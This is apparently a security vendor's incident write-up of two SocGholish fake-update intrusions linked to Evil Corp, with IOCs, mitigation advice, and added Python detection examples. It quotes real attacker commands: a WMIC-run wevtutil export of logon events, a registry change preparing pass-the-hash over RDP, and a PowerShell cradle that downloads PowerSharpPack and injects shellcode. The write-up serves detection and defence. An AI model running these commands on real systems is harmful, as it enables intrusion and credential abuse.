April 25, 2024
Editor’s note: Dean Murphy, Brandon Tirado, and Joseph Morales all contributed to this blog.
The “SocGholish” (aka FakeUpdates) malware distribution framework has presented a gripping tale of intrigue and suspense for ReliaQuest this year. In January alone, we identified and responded to two separate “hands-on-keyboard” intrusions traced back to a SocGholish compromise. We contained both intrusions before the threat actor could reach what looked like their primary objective: deploying ransomware.
Think of SocGholish primarily as a preliminary foothold that provides access for additional cyber-crime groups. Across these two intrusions we found overlapping artifacts suggesting that both compromises came from the same threat actor, and network telemetry from both matched infrastructure attributed to Evil Corp, which may indicate that group’s involvement. Read on to find out what else we observed in this page-turner of an assessment.
Let’s start with a bit of story exposition. The SocGholish malware distribution network uses social engineering and drive-by compromise to drop malware on endpoints. A compromised legitimate website presents the visitor with a fake browser or system update (as seen below); accepting it downloads an archive file containing the SocGholish JavaScript payload.
Once executed, the JavaScript payload establishes a command-and-control (C2) channel and relays the system information it has gathered from the compromised endpoint. If the host is domain joined (a member of an Active Directory domain, which signals a corporate network rather than a home machine), the C2 server sends additional discovery commands, and the payload executes them to collect more detail. If the endpoint and its environment pique the interest of the threat actor operating the campaign, Cobalt Strike or a similar framework is typically deployed for post-exploitation objectives.
Figure 1: SocGholish fake update link
Telemetry sources for our investigations into these events rely on information fed into GreyMatter by our customers. This gives us increased visibility, unifies disparate workflows, and allows quicker responses to active intrusions.
A SocGholish compromise depends on user interaction. In the intrusions we tackled, we found evidence that users on the beachheads (the original hosts that were compromised) had visited a compromised domain belonging to a large transportation service company. Inspecting the site’s HTML DOM (the browser’s tree representation of the page) showed it loading JavaScript from “taxes[.]rpacx[.]com”, which hosted the stage 2 SocGholish payload: the fake update.
Figure 2: SocGholish site details
Figure 3: SocGholish HTML DOM
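As an added example (not code from the post or from ReliaQuest), the following Python script performs the DOM check described above in a repeatable way: it parses a page’s HTML, lists every external script origin, and flags origins that are neither the site itself nor a known CDN. The HTML, the site name and the allowlist are constructed for the example; the flagged domain is the stage 2 host named above, with a hypothetical script path.

```python
"""Audit a page's HTML for third-party <script src> loaders.

Added example, not from the post. SocGholish injects a loader into a legitimate,
compromised site; the loader then pulls the fake-update page from attacker
infrastructure. Listing every external script origin and comparing it with the
site's own origin (or an allowlist of known CDNs) is a quick way to spot the
injection when reviewing a DOM.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed HTML resembling a compromised site: one first-party script, one
# known CDN script, and an injected loader pointing at the stage 2 host from the
# post (the /tracker.js path is hypothetical).
SAMPLE_HTML = """
<html><head>
<script src="/js/site.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://taxes.rpacx.com/tracker.js"></script>
</head><body>...</body></html>
"""

# Assumption: the CDNs this site is known to use.
KNOWN_CDNS = {"cdnjs.cloudflare.com", "ajax.googleapis.com"}


class ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def external_script_hosts(html, page_url):
    """Return the distinct hostnames of scripts not served from the page's own origin."""
    parser = ScriptSrcParser()
    parser.feed(html)
    own = urlparse(page_url).hostname
    hosts = []
    for src in parser.srcs:
        host = urlparse(src).hostname  # None for relative paths such as /js/site.js
        if host and host != own and host not in hosts:
            hosts.append(host)
    return hosts


def suspicious_script_hosts(html, page_url, allowlist=KNOWN_CDNS):
    """External script origins that are not on the allowlist: candidates for injected loaders."""
    return [h for h in external_script_hosts(html, page_url) if h not in allowlist]


if __name__ == "__main__":
    for h in suspicious_script_hosts(SAMPLE_HTML, "https://www.example-transport.com/"):
        print("unexpected script origin:", h)
```

The parser also catches protocol-relative sources (`//host/x.js`), which `urlparse` resolves to a hostname; inline scripts have no `src` and would need a separate content check.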
Once a site visitor initiated the download of the fake update, an archive file was written to the user’s disk. Inside it was a JavaScript payload named “Update.js”. The two intrusions occurred at different times, but similar payloads with the same naming convention were delivered from the same infrastructure.
When the user double-clicked the JavaScript payload, Windows Script Host (wscript.exe) executed it. Execution of the payload established C2 with a stage 3 site. In these intrusion sets, the stage 3 sites were:
*.signing.unitynotarypublic[.]com
*.asset.tradingvein[.]xyz
These connections were used to receive further instructions and to relay the output of initial discovery commands, which was staged in TXT files under AppData\Local\Temp\ in the user’s profile.
When reviewing the IP addresses hosting the stage 3 domains, we discovered another commonality: both domains resolved to the same IP address, 88.119.169[.]108. VirusTotal’s passive DNS entries for this IP address showed various subdomains in use.
We also found similar payloads tied to that IP address. We used the following VirusTotal intelligence query:
type:js AND name:update.js AND contacted_ip:88.119.169.108
The query revealed 12 JavaScript files that—based on the information above—we feel very confident are tied back to this larger SocGholish campaign.
Figure 4: VirusTotal Intelligence Query
Figure 5: Passive DNS replications for 88.119.169[.]108
Shortly after the initial compromises, the threat actor used the SocGholish C2 channels to transfer a Cobalt Strike HTTPS beacon to the compromised hosts. In Intrusion set 1, the HTTPS beacon established a C2 channel with the server change-land[.]com (31.184.254[.]115). These were the initial signals identified by the ReliaQuest Threat Hunting team that prompted a response. As it turns out, the domain belongs to a cluster of infrastructure that we assess with moderate confidence is used by the notorious Evil Corp cyber-crime syndicate.
The remaining artifacts described below relate to Intrusion set 1. Thanks to a swift response, combined with a threat actor who went dormant, no post-exploitation activity beyond the HTTPS beacon’s execution was carried out in Intrusion set 2.
With the HTTPS beacon executing, additional information discovery efforts took place and enabled the threat actor to start attempting to move laterally. In this intrusion set, the threat actor seemed to favor an interactive session, making use of remote desktop protocol (RDP) and a valid admin account to pivot to a server on the network. Success led to even more discovery efforts from this endpoint. Of those discovery efforts, most were “textbook” ransomware affiliate operations, but one operation stood out.
The Windows Management Instrumentation Command-line (WMIC) was used to connect to a domain controller and execute this command:
"wmic /node:redacted.remote.host process call create 'wevtutil epl Security C:\\programdata\\redacted.evtx /q:Event[System[(EventID=4776)]]'"
The inner command uses wevtutil epl to export the domain controller’s Security log, filtered by the XPath query given to /q: to Event ID 4776 (the computer attempted to validate the credentials for an account), into the file C:\programdata\redacted.evtx. Because wmic /node: runs the process on the remote host, that file lands on the domain controller’s own disk. Event 4776 is recorded on the DC for every NTLM credential validation and includes the account name and the source workstation, so the export hands the attacker a map of which accounts authenticate from which hosts.
Typically, we’ve observed wevtutil used for defense evasion (clearing event logs), but something else seems afoot here: it was used for discovery objectives, and, at the time of writing, we haven’t found any other public reporting of this utility being used maliciously in this way.
The plotline ebbed a bit at this point, as activity ceased for roughly three days. It resumed with this attacker’s Windows binary of choice, WMIC, used to run the following command, which sets the DisableRestrictedAdmin value under the LSA key to 0:
process call create cmd /c reg add hklm\\System\\CurrentControlSet\\Control\\LSA /f /v disablerestrictedadmin /t REG_DWORD /d 0
A note on the value’s semantics: the value is named DisableRestrictedAdmin, so writing 0 enables Restricted Admin mode for inbound RDP on that host rather than disabling it. In Restricted Admin mode the connecting user’s credentials are not sent to the remote host, so they never reach its memory; the trade-off is that the RDP client can then authenticate with nothing more than an NTLM hash (mstsc.exe /restrictedadmin). Turning the mode on from a host the attacker already controlled is therefore consistent with preparing a “pass the hash” attack over RDP: reusing a stolen NTLM hash to open an interactive session on hosts in the network without knowing the plaintext password. Monitoring for writes to this value is worthwhile, because legitimate administrators rarely toggle it ad hoc.
On an adjacent host, we observed WMIC being used to execute a PowerShell download cradle. The following command pulls PowerSharpPack from its GitHub repository, loads it in memory with Invoke-Expression (iex), and runs its UrbanBishop module:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1'); PowerSharpPack -UrbanBishop -Command '-i 9876 -p C:\programdata\ch.tmp'
UrbanBishop injects shellcode read from a file into a running process: -i 9876 names the target process ID and -p the file holding the shellcode, here C:\programdata\ch.tmp.
The intent of this activity is odd, as earlier evidence showed the threat actor already operating a Cobalt Strike HTTPS beacon, which has its own process-injection capability. Why the attacker chose to perform ingress tool transfer for an additional way to inject into processes remains unclear at the time of writing.
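To make the observed tradecraft hunt-able, here is an added example in Python that is not code from the post or from GreyMatter: four detection rules run over constructed Sysmon-style process-creation records. The rules cover the stages walked through above: wscript.exe executing a .js payload from a user profile, a remote wevtutil export of the Security log via wmic /node:, the DisableRestrictedAdmin registry write, and a PowerShell download cradle. The command lines in the sample events reproduce the ones reported in this post (redactions kept); hostnames, parent images and the field layout are assumptions.

```python
"""Hunt the command lines from these intrusions in process-creation telemetry.

Added example, not from the post. Each rule is a predicate over a flat event
record (image, parent image, command line); run them over your own Sysmon
Event ID 1 or EDR process events after mapping the field names.
"""
import re

RULES = [
    # wscript.exe running a .js file from somewhere under C:\Users\<name>\ (Downloads, Temp, ...)
    ("socgholish_js_via_wscript",
     lambda e: e["image"].lower().endswith("\\wscript.exe")
     and re.search(r"\\users\\[^\\]+\\.*\.js\b", e["cmd"], re.I) is not None),
    # wevtutil exporting the Security log, launched remotely (wmic /node: or under WmiPrvSE)
    ("remote_security_log_export",
     lambda e: re.search(r"\bwevtutil(\.exe)?\b.*\bepl\b.*\bsecurity\b", e["cmd"], re.I) is not None
     and ("/node:" in e["cmd"].lower() or e["parent"].lower().endswith("\\wmiprvse.exe"))),
    # reg add touching HKLM\...\Control\Lsa\DisableRestrictedAdmin (either direction)
    ("restrictedadmin_registry_change",
     lambda e: re.search(r"\breg(\.exe)?\s+add\b.*\\lsa\b.*disablerestrictedadmin", e["cmd"], re.I) is not None),
    # Invoke-Expression fed by a web download: the classic PowerShell cradle
    ("powershell_download_cradle",
     lambda e: re.search(r"\biex\b|invoke-expression", e["cmd"], re.I) is not None
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", e["cmd"], re.I) is not None),
]

# Constructed events. The four malicious command lines are the ones reported in
# the post; hosts, parents and the two benign records are invented for the example.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\jdoe\Downloads\Update.js"'},
    {"host": "WS01", "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"wmic /node:redacted.remote.host process call create 'wevtutil epl Security C:\programdata\redacted.evtx /q:Event[System[(EventID=4776)]]'"},
    {"host": "SRV02", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r"cmd /c reg add hklm\System\CurrentControlSet\Control\LSA /f /v disablerestrictedadmin /t REG_DWORD /d 0"},
    {"host": "SRV03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r"powershell iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1'); PowerSharpPack -UrbanBishop -Command '-i 9876 -p C:\programdata\ch.tmp'"},
    # benign noise: a logon script and a local event-log query
    {"host": "WS05", "image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Program Files\Vendor\logon.vbs"'},
    {"host": "DC01", "image": r"C:\Windows\System32\wevtutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"wevtutil qe Application /c:5 /f:text"},
]


def evaluate(events, rules=RULES):
    """Return (host, rule_name, cmd) for every event that matches a rule, in event order."""
    hits = []
    for e in events:
        for name, pred in rules:
            if pred(e):
                hits.append((e["host"], name, e["cmd"]))
    return hits


if __name__ == "__main__":
    for host, rule, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {cmd[:90]}")
```

The first rule is deliberately scoped to .js files under a user profile rather than to wscript.exe in general, since logon scripts and vendor tooling run under Windows Script Host legitimately; tune the path pattern and the parent-process conditions to your own baseline before alerting on them.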
And that’s the end of the saga; after this point, the intrusion was contained, and the threat actor evicted from the customer’s environment.
SocGholish is well practiced in such plotlines: disguising fake updates and tricking browser or system users into malicious downloads. In other words, don’t take it lightly. As demonstrated by the events above, a SocGholish infection can lead to a much more severe situation than just an infected endpoint. We’re highly confident that the attacker’s final objective was to deploy ransomware, based on their techniques, infrastructure ties to Evil Corp, and intelligence on previous intrusions that started with SocGholish.
The ReliaQuest GreyMatter security operations platform empowers customers to investigate, detect, and respond to the threats that matter most. The platform increases visibility to help you get the most out of your existing security investments and reduces the complexity of the DIR lifecycle. This ultimately allows ReliaQuest and our customers to efficiently counter known and emerging threats. We provide customers with detection capabilities and actionable intelligence to hinder the implications of a SocGholish infection. Here are some agnostic recommendations for any environment to help combat this threat:
Configure a GPO to set Notepad as the default application for JavaScript (.js) files, for example by changing the default handler for the JSFile class (HKEY_CLASSES_ROOT\JSFile\Shell\Open\Command) from wscript.exe to notepad.exe. A user who double-clicks a SocGholish payload then sees its source in an editor instead of executing it. The same treatment is worth applying to the other Windows Script Host extensions (.jse, .vbs, .vbe, .wsf, .wsh).
Ensure effective logging is in place to identify the initial compromise and any subsequent implications. This telemetry should be shipped to a centralized logging platform to enable detection capabilities.
Train staff to identify social engineering tactics employed on the web. SocGholish uses social engineering to prompt Internet users to download fraudulent browser or system upgrades.
Indicators of compromise from these intrusions:
taxes.rpacx[.]com (stage 2 host serving the fake update)
*.signing.unitynotarypublic[.]com (stage 3 SocGholish C2)
*.asset.tradingvein[.]xyz (stage 3 SocGholish C2)
88.119.169[.]108 (IP address hosting both stage 3 domains)
change-land[.]com (Cobalt Strike HTTPS beacon C2, Intrusion set 1)
31.184.254[.]115 (IP address of change-land[.]com)